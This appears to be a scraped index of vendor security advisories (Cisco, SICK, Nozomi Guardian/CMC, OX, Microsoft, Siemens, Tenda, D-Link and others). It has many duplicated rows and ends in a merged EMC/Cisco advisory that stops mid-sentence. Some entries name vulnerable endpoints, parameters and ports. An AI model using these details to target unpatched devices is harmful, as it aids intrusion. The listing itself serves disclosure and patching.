cisco-sa-ccp-info-disc-zygerqpd	Cisco Customer Collaboration Platform Information Disclosure Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-meraki-mx-vpn-dos-qtrhzg2	Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities	2024-10-02T16:00:00+00:00	2025-06-02T14:22:28+00:00
cisco-sa-meraki-mx-vpn-dos-by-qwukqv7x	Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Session Takeover and Denial of Service Vulnerability	2024-10-02T16:00:00+00:00	2025-06-02T14:22:27+00:00
cisco-sa-webex-xss-7teqtfn8	Cisco Webex Services Cross-Site Scripting Vulnerabilities	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-webex-cache-q4xbkqbg	Cisco Webex Meetings Services HTTP Cache Poisoning Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-sna-ssti-dpulqsmz	Cisco Secure Network Analytics Manager Privilege Escalation Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-sna-apiacv-4b6x5ysw	Cisco Secure Network Analytics Manager API Authorization Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-ise-restart-ss-uf986g2q	Cisco Identity Services Engine RADIUS Denial of Service Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-duo-ssp-cmd-inj-rcmyrna	Cisco Duo Self-Service Portal Command Injection Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-cuis-priv-esc-3pk96su4	Cisco Unified Intelligence Center Privilege Escalation Vulnerabilities	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
sca-2025-0008	Multiple vulnerabilities in Endress+Hauser MEAC300-FNADE4	2025-07-03T13:00:00.000Z	2025-07-03T13:00:00.000Z
sca-2025-0007	Multiple vulnerabilities in SICK Field Analytics and SICK Media Server	2025-06-12T13:00:00.000Z	2025-06-12T13:00:00.000Z
sca-2025-0003	FreeRTOS Vulnerabilities have no impact on SICK Products	2025-02-28T00:00:00.000Z	2025-05-20T11:00:00.000Z
sca-2025-0006	Vulnerability affecting picoScan and multiScan	2025-04-28T13:00:00.000Z	2025-04-28T13:00:00.000Z
sca-2025-0005	Vulnerabilities in SICK Flexi Compact	2025-04-28T10:00:00.000Z	2025-04-28T10:00:00.000Z
sca-2025-0004	Critical vulnerabilities in SICK DL100-2xxxxxxx	2025-03-14T11:00:00.000Z	2025-03-14T11:00:00.000Z
sca-2025-0001	Multiple vulnerabilities in SICK MEAC300	2025-02-14T14:00:00.000Z	2025-02-21T14:00:00.000Z
sca-2025-0002	Vulnerability in SICK Lector8xx and SICK InspectorP8xx	2025-02-14T10:19:00.000Z	2025-02-14T10:19:00.000Z
sca-2024-0007	Vulnerability in SICK OLM	2024-12-31T00:00:00.000Z	2024-12-31T00:00:00.000Z
sca-2024-0006	Critical vulnerabilities in SICK InspectorP61x, InspectorP62x and TiM3xx	2024-12-06T00:00:00.000Z	2024-12-06T00:00:00.000Z
sca-2024-0005	Vulnerability in SICK Incoming Goods Suite	2024-11-19T00:00:00.000Z	2024-11-19T00:00:00.000Z
sca-2024-0004	Third party vulnerabilities in SICK CDE-100	2024-11-07T12:00:00.000Z	2024-11-07T12:00:00.000Z
sca-2024-0003	Critical vulnerability in multiple SICK products	2024-10-17T13:00:00.000Z	2024-10-17T13:00:00.000Z
sca-2024-0002	Vulnerability in SICK MSC800	2024-09-11T23:00:00.000Z	2024-09-11T23:00:00.000Z
sca-2024-0001	Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics	2024-01-29T00:00:00.000Z	2024-01-29T00:00:00.000Z
sca-2023-0011	Vulnerability in multiple SICK Flexi Soft Gateways	2023-10-23T11:00:00.000Z	2023-10-23T11:00:00.000Z
SCA-2023-0011	Vulnerability in multiple SICK Flexi Soft Gateways	2023-10-23T11:00:00.000Z	2023-10-23T11:00:00.000Z
sca-2023-0010	Vulnerabilities in SICK Application Processing Unit	2023-10-09T11:00:00.000Z	2023-10-09T11:00:00.000Z
SCA-2023-0010	Vulnerabilities in SICK Application Processing Unit	2023-10-09T11:00:00.000Z	2023-10-09T11:00:00.000Z
sca-2023-0008	Vulnerability in SICK SIM1012	2023-09-29T13:00:00.000Z	2023-09-29T13:00:00.000Z
SCA-2023-0008	Vulnerability in SICK SIM1012	2023-09-29T13:00:00.000Z	2023-09-29T13:00:00.000Z
sca-2023-0009	Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products	2023-09-29T10:00:00.000Z	2023-09-29T10:00:00.000Z
SCA-2023-0009	Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products	2023-09-29T10:00:00.000Z	2023-09-29T10:00:00.000Z
sca-2023-0007	Vulnerabilities in SICK LMS5xx	2023-08-25T11:00:00.000Z	2023-08-25T11:00:00.000Z
SCA-2023-0007	Vulnerabilities in SICK LMS5xx	2023-08-25T11:00:00.000Z	2023-08-25T11:00:00.000Z
sca-2023-0006	Vulnerabilities in SICK ICR890-4	2023-07-10T13:00:00.000Z	2023-07-10T13:00:00.000Z
SCA-2023-0006	Vulnerabilities in SICK ICR890-4	2023-07-10T13:00:00.000Z	2023-07-10T13:00:00.000Z
sca-2023-0005	Vulnerabilities in SICK EventCam App	2023-06-19T11:00:00.000Z	2023-06-19T11:00:00.000Z
SCA-2023-0005	Vulnerabilities in SICK EventCam App	2023-06-19T11:00:00.000Z	2023-06-19T11:00:00.000Z
sca-2023-0004	Vulnerabilities in SICK FTMg	2023-05-11T13:00:00.000Z	2023-05-11T13:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
nn-2025:2-01	Privilege escalation in Guardian/CMC before 24.6.0	2025-06-10T11:00:00.000Z	2025-06-10T11:00:00.000Z
nn-2025:1-01	Authenticated RCE in update functionality in Guardian/CMC before 24.6.0	2025-06-10T11:00:00.000Z	2025-06-10T11:00:00.000Z
nn-2023_17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
nn-2023:17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
NN-2023:17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
nn-2024_1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
nn-2024:1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
NN-2024:1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
nn-2023_12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
nn-2023:12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
NN-2023:12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
nn-2023_9-01	Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_8-01	Session Fixation in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_7-01	DoS via SAML configuration in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_6-01	Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_5-01	Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_4-01	Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_3-01	Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_2-01	Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_11-01	SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_10-01	DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_1-01	Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2	2023-05-03T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:9-01	Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:8-01	Session Fixation in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:7-01	DoS via SAML configuration in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:6-01	Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:5-01	Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:4-01	Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:3-01	Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:2-01	Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
oxas-adv-2025-0001	OX App Suite Security Advisory OXAS-ADV-2025-0001	2025-01-27T00:00:00+01:00	2025-04-07T00:00:00+00:00
oxdc-adv-2024-0003	OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003	2024-09-10T00:00:00+02:00	2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002	OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002	2024-09-10T00:00:00+02:00	2024-09-10T00:00:00+00:00
oxas-adv-2024-0005	OX App Suite Security Advisory OXAS-ADV-2024-0005	2024-07-08T00:00:00+02:00	2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001	OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001	2024-09-02T00:00:00+02:00	2024-09-06T00:00:00+00:00
oxas-adv-2024-0004	OX App Suite Security Advisory OXAS-ADV-2024-0004	2024-06-13T00:00:00+02:00	2024-08-19T00:00:00+00:00
oxas-adv-2024-0003	OX App Suite Security Advisory OXAS-ADV-2024-0003	2024-04-24T00:00:00+02:00	2024-08-19T00:00:00+00:00
oxas-adv-2024-0002	OX App Suite Security Advisory OXAS-ADV-2024-0002	2024-03-06T00:00:00+01:00	2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002	OX App Suite Security Advisory OXAS-ADV-2024-0002	2024-03-06T00:00:00+01:00	2024-05-06T00:00:00+00:00
oxas-adv-2024-0001	OX App Suite Security Advisory OXAS-ADV-2024-0001	2024-02-08T00:00:00+01:00	2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001	OX App Suite Security Advisory OXAS-ADV-2024-0001	2024-02-08T00:00:00+01:00	2024-04-25T00:00:00+00:00
oxas-adv-2023-0007	OX App Suite Security Advisory OXAS-ADV-2023-0007	2023-12-11T00:00:00+01:00	2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007	OX App Suite Security Advisory OXAS-ADV-2023-0007	2023-12-11T00:00:00+01:00	2024-02-16T00:00:00+00:00
oxas-adv-2023-0006	OX App Suite Security Advisory OXAS-ADV-2023-0006	2023-09-25T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0005	OX App Suite Security Advisory OXAS-ADV-2023-0005	2023-09-19T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0004	OX App Suite Security Advisory OXAS-ADV-2023-0004	2023-08-01T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0003	OX App Suite Security Advisory OXAS-ADV-2023-0003	2023-05-02T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0002	OX App Suite Security Advisory OXAS-ADV-2023-0002	2023-03-20T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0001	OX App Suite Security Advisory OXAS-ADV-2023-0001	2023-02-06T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2022-0002	OX App Suite Security Advisory OXAS-ADV-2022-0002	2022-11-02T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2022-0001	OX App Suite Security Advisory OXAS-ADV-2022-0001	2022-08-10T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006	OX App Suite Security Advisory OXAS-ADV-2023-0006	2023-09-25T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005	OX App Suite Security Advisory OXAS-ADV-2023-0005	2023-09-19T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004	OX App Suite Security Advisory OXAS-ADV-2023-0004	2023-08-01T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0003	OX App Suite Security Advisory OXAS-ADV-2023-0003	2023-05-02T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0002	OX App Suite Security Advisory OXAS-ADV-2023-0002	2023-03-20T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0001	OX App Suite Security Advisory OXAS-ADV-2023-0001	2023-02-06T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0002	OX App Suite Security Advisory OXAS-ADV-2022-0002	2022-11-02T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0001	OX App Suite Security Advisory OXAS-ADV-2022-0001	2022-08-10T00:00:00+02:00	2024-01-22T00:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
msrc_cve-2025-33069	Windows App Control for Business Security Feature Bypass Vulnerability	2025-06-10T07:00:00.000Z	2025-07-09T07:00:00.000Z
msrc_cve-2025-49760	Windows Storage Spoofing Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49756	Office Developer Platform Security Feature Bypass Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49753	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49744	Windows Graphics Component Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49742	Windows Graphics Component Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49740	Windows SmartScreen Security Feature Bypass Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49739	Visual Studio Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49738	Microsoft PC Manager Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49737	Microsoft Teams Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49735	Windows KDC Proxy Service (KPSSVC) Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49733	Win32k Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49732	Windows Graphics Component Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49731	Microsoft Teams Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49730	Microsoft Windows QoS Scheduler Driver Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49729	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49727	Win32k Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49726	Windows Notification Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49725	Windows Notification Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49724	Windows Connected Devices Platform Service Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49723	Windows StateRepository API Server file Tampering Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49722	Windows Print Spooler Denial of Service Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49721	Windows Fast FAT File System Driver Elevation of Privilege Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49719	Microsoft SQL Server Information Disclosure Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49718	Microsoft SQL Server Information Disclosure Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49717	Microsoft SQL Server Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49716	Windows Netlogon Denial of Service Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49714	Visual Studio Code Python Extension Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49711	Microsoft Excel Remote Code Execution Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z
msrc_cve-2025-49706	Microsoft SharePoint Server Spoofing Vulnerability	2025-07-08T07:00:00.000Z	2025-07-08T07:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description
var-202407-2188	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202406-3119	Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 is a new generation of multi-service security gateway. Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-1740	NBR6135-E is a router. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6135-E has a command execution vulnerability, and attackers can exploit the vulnerability to execute commands.
var-202407-1417	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause equipment shutdown and manually restart the PLC to recover.
var-202407-1103	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202407-0957	WinCC is a SCADA system suitable for all walks of life. It can access devices from mobile terminals, extract intelligent data, analyze data and make reports. Siemens (China) Co., Ltd. WinCC has a denial of service vulnerability, which can be exploited by attackers to cause denial of service.
var-202407-0819	SIMATIC S7-1500 is a modular control system suitable for various automation applications in the field of discrete automation. There is a denial of service vulnerability in SIMATIC S7-1500 of Siemens (China) Co., Ltd., which can be exploited by attackers to cause denial of service.
var-202407-0818	NBR6210-E is a router product. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6210-E has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-0779	Tenda i29V1.0 V1.0.0.5 was discovered to contain a hardcoded password for root. Tenda of i29 A vulnerability exists in the firmware regarding the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0778	Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/addWifiMacFilter. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0745	Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202305-1479	D-Link DIR-2150 SetTriggerPPPoEValidate Username Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20554. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202108-1158	A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.5. An application may be able to gain elevated privileges. apple's macOS There is a race condition vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. REJECT DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none
var-201109-0089	Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of 